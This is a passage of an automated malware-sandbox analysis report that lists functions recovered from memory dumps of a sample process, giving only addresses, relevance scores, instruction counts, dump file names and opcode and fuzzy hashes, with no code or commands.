                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 188469b372e474ed9d18d2bad133a3fa4c25f8be9c0f7ef5c61e8945ec31cca0
                        • Instruction ID: bb6b60e6617cf8655570662a49b9a21510c221cb62013b4b276b82357bb987d6
                        • Opcode Fuzzy Hash: 188469b372e474ed9d18d2bad133a3fa4c25f8be9c0f7ef5c61e8945ec31cca0
                        • Instruction Fuzzy Hash: C4126730B006249FDB11EFA8C550A6EBBF6FFC5706F508988D5029F795CB75E8098B86
                        Function 0658056A Relevance: .5, Instructions: 464COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 759b581c8885c3cb9e3f77e22ca7659201f89cfe877d5cdd599fcdc7d1d71c1a
                        • Instruction ID: 1ed87250742e7c23b1ddd2b0f7b4051bc791058a3952099613d5f9545c4b3a1b
                        • Opcode Fuzzy Hash: 759b581c8885c3cb9e3f77e22ca7659201f89cfe877d5cdd599fcdc7d1d71c1a
                        • Instruction Fuzzy Hash: 16026830B006249FDB50EFA8C550A6E7BF6BFC5705F508988D5029F7A5CBB5E8098B86
                        Function 065805E0 Relevance: .4, Instructions: 427COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34a3714849dbeb4a382f1b25dff43496c8ce507b9bb914db381989f7245842d3
                        • Instruction ID: 2acc2c98e7dc9379fbff2ea10ef45d3b8ab45d35d917ad707e72479b29fb99e9
                        • Opcode Fuzzy Hash: 34a3714849dbeb4a382f1b25dff43496c8ce507b9bb914db381989f7245842d3
                        • Instruction Fuzzy Hash: DA026830B006249FDB50EFA8C950A6E7BF6BF85705F508949E5029F7A5CB75E809CF82
                        Function 06580656 Relevance: .4, Instructions: 389COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfc215acf9296deb841ed3bd29f871dd6aa5724b60b37b2de5bab5ba76ba70c
                        • Instruction ID: 9404a3d849b806c9620b1d00306786106fa45dad8babcbe915fb074db4439d7c
                        • Opcode Fuzzy Hash: 6bfc215acf9296deb841ed3bd29f871dd6aa5724b60b37b2de5bab5ba76ba70c
                        • Instruction Fuzzy Hash: 45F15930B002249FDB54EFA8C950A6E7BF6BF85705F508449E5029F7E5CBB5E849CB82
                        Function 06580000 Relevance: .4, Instructions: 357COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88794012d682f8f65b374e24c652abd26b2917f291f042622ab01eaa6784a0b9
                        • Instruction ID: 4a0ffdcf7242401c14bf846cffbe9a000a2246237ebab3d2f6adef04e715fca5
                        • Opcode Fuzzy Hash: 88794012d682f8f65b374e24c652abd26b2917f291f042622ab01eaa6784a0b9
                        • Instruction Fuzzy Hash: 4BD18C30B012149FEB419FA8C955A6A7BFABF85704F10809AE501DF7E6CB71D849CF92
                        Function 065806CC Relevance: .4, Instructions: 355COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 973100356912e3fc2b049ca6d0279c0eda37e66ca418de1f29b25fb246accee3
                        • Instruction ID: 364c8b32492a604db4b199ba557ee8becdce8912769bb0f1f3a8cb373f922e1d
                        • Opcode Fuzzy Hash: 973100356912e3fc2b049ca6d0279c0eda37e66ca418de1f29b25fb246accee3
                        • Instruction Fuzzy Hash: 9BE15A30B002149FEB44EFA8C951A6A7BF6BF85705F508449E5029F7E6CB71E849CF92
                        Function 06581534 Relevance: .3, Instructions: 340COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4bf18ee143b47af9306215c6aca0a5278a51572cfb2fffe991079ae6ff87632
                        • Instruction ID: 71c4b768aceb264c546a219027f1c2159246725edd860050685772ab846a64ed
                        • Opcode Fuzzy Hash: f4bf18ee143b47af9306215c6aca0a5278a51572cfb2fffe991079ae6ff87632
                        • Instruction Fuzzy Hash: B8C14B34B00604AFDB14DF98C995D6D7BB2FF89700FA18059EA02AB7A1C672FC15CB56
                        Function 06581308 Relevance: .2, Instructions: 206COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b80eac953f733075ac23ff820579ad215245d9b147ece8144443b32f4ec74a25
                        • Instruction ID: 127bcc22c1dd1e187d8a469c2ff82ccc9c340bad778e9f8c86b34753fc1f51da
                        • Opcode Fuzzy Hash: b80eac953f733075ac23ff820579ad215245d9b147ece8144443b32f4ec74a25
                        • Instruction Fuzzy Hash: 79613832B047068FCB64AF79D84057ABBE5FFC5211B14857AD846DB621EF31C846CBA1
                        Function 0658338B Relevance: .1, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: faf110c94943fc7c08b4ec5fb965043560c2c35b6f5a1dbc538e3196e35c77d8
                        • Instruction ID: 45f3483ba16a4716e984a8440edfda8def0e07f4affc50bb6757ada407df35cf
                        • Opcode Fuzzy Hash: faf110c94943fc7c08b4ec5fb965043560c2c35b6f5a1dbc538e3196e35c77d8
                        • Instruction Fuzzy Hash: 50214835B00104AFDB54DF69D894EA9BBB2FF88714F1180A9E9099F3A2DE31EC05CB50
                        Function 029BD054 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965513842.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29bd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 473c6ba87c6d03471ee2744602d360c0c0427fc034da9d2acf9762b16847edde
                        • Instruction ID: 254010609ed15005f781bd0e64a093f493cbe24c3ebf1b606cb22bddf3449b3d
                        • Opcode Fuzzy Hash: 473c6ba87c6d03471ee2744602d360c0c0427fc034da9d2acf9762b16847edde
                        • Instruction Fuzzy Hash: 4D21D675504240EFDB1ADF14DAC4B66BFA9FF88314F24C669E9090B256C336D416CBB1
                        Function 029CD2F4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965581601.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29cd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f6b47edd2e904aa436eff40b586bf90cc6dd10f6d31295e7179ea2da70f1b332
                        • Instruction ID: 4e7531a5decd923d4b1c13cd70beda336dedad8a1be0fa1c7b4b44ba7609e9da
                        • Opcode Fuzzy Hash: f6b47edd2e904aa436eff40b586bf90cc6dd10f6d31295e7179ea2da70f1b332
                        • Instruction Fuzzy Hash: E421A7B5604244DFDB05DF14D9C4B1ABBA5FB84328F34CA7DD8494B285C37AD446C6B2
                        Function 029CD4A4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965581601.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29cd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98f7003abcb946302ece208deea36ba1cb734fba7af8ce6d61dc57382aaf8140
                        • Instruction ID: 5410867dad2ebadcc01269bf81b4a953e6f8e070ccffe3e75825b0b3cff7a861
                        • Opcode Fuzzy Hash: 98f7003abcb946302ece208deea36ba1cb734fba7af8ce6d61dc57382aaf8140
                        • Instruction Fuzzy Hash: 8721D3B1604244AFDB05DF14D5C4B26BBA5FB84318F34C97DD90A4B296C736D406CA72
                        Function 029BD04F Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965513842.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29bd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
                        • Instruction ID: 924edea556f5950780305af5e412bd483541338830f7725f5da42b5a2da256fc
                        • Opcode Fuzzy Hash: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
                        • Instruction Fuzzy Hash: 93219D76504280DFCB1ADF10DAC4B56BF72FF88324F24C6A9D9490A256C33AD426CBA1
                        Function 029CD49F Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965581601.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29cd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction ID: 9ed795c4f569ad1c176607ca4ef8cee6521b5551c9cf9b3c1ae346601681ba73
                        • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction Fuzzy Hash: 6111BE75904280CFCB02CF14C5C4B15BBA1FB84218F34C6AED8494B256C33AD40ACB62
                        Function 029CD2EF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965581601.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29cd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                        • Instruction ID: 4330c2117499c1cae4cd9ef00898100f9f6d23666334996a7e6894a26c7a6175
                        • Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                        • Instruction Fuzzy Hash: 2F119D76504280DFDB12CF14D5C4B19BB62FB84328F24C6AED8494B656C33AD40ACBA2
                        Function 029BDA41 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965513842.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29bd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f91c697266932a418a49224038d8ef72a59212f439b979ae6919828af9135ebd
                        • Instruction ID: 69eb5c1e91d5df39a2cd382dc53eec6df3ad52cb697d4d4c172cf61eddfcdbd8
                        • Opcode Fuzzy Hash: f91c697266932a418a49224038d8ef72a59212f439b979ae6919828af9135ebd
                        • Instruction Fuzzy Hash: 8D01DB7110D3449AE7119A15CEC4BA6BFECDF52325F1CC95AED090F282C7799840CBB1
                        Function 029BDA40 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1965513842.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_29bd000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fe328d75f1ed86c521db9b5bb90a7ebfdbfab9008c691390fa8ff6de6450231f
                        • Instruction ID: bc4414f2935b2b0136762fe2301c008a67e10cda2f6c8a7ebae5056acd916d16
                        • Opcode Fuzzy Hash: fe328d75f1ed86c521db9b5bb90a7ebfdbfab9008c691390fa8ff6de6450231f
                        • Instruction Fuzzy Hash: 47F06272509344AEE7118A15CD88B62FFACEF51734F18C55AED084E286C3799844CBB1

                        Non-executed Functions

                        Function 06580D50 Relevance: 10.3, Strings: 8, Instructions: 300COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.1984856741.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6580000_TmfmVKU.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: c1b4b8ac8ac542df5cbbb988cf83bde1a59e3f8c92873baefaf43d915515fe74
                        • Instruction ID: 40a755334b546e67c95de2765a77bf16eb2285480207b37092fa1ef0db2b1567
                        • Opcode Fuzzy Hash: c1b4b8ac8ac542df5cbbb988cf83bde1a59e3f8c92873baefaf43d915515fe74
                        • Instruction Fuzzy Hash: 66B1D230B002498FDB55EB69C8549BEBBF6BF88310B14C46AE406EB7A1DB35DC45CB91